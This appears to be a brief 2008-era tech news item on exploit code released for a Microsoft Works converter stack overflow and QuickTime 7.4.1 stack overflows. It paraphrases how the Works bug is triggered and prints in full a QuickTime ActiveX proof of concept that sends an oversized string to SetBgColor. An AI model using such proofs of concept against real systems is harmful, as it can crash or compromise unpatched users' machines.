Exploit code surfaces for Microsoft Works, QuickTime

Exploit code for Microsoft Works--which was just patched on Tuesday--and QuickTime is making the rounds.

First up, the Microsoft Works exploit. A hacker dubbed "chujwamwdupe," who also makes Teletubbies references for giggles, posted the following:

A vulnerability exists in WPS to RTF convert filter that is part of Microsoft Office 2003. It could be exploited by remote attacker to take complete control of an affected system. This issue is due to stack overflow error in function that read secions from WPS file. When we change size of for example TEXT section to number langer than 0x10, stack overflow occurs - very easy to exploit.

The code is also available on Milw0rm. Microsoft had patched this issue with bulletin MS08-011 on Tuesday.

Meanwhile, Laurent Gaffié posted a proof of concept for multiple stack overflow vulnerabilities for QuickTime 7.4.1.

That code, also posted on Milw0rm, is as follows:

Proof of concept example [works with the others functions supplyed in section 2) ] : <html> <object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object> <input type="button" value="Hit me" language="VBScript" OnClick="test()"> <script language="VBScript"> sub test() bar = String(515305, "A") foo.SetBgColor bar End Sub </script> </html>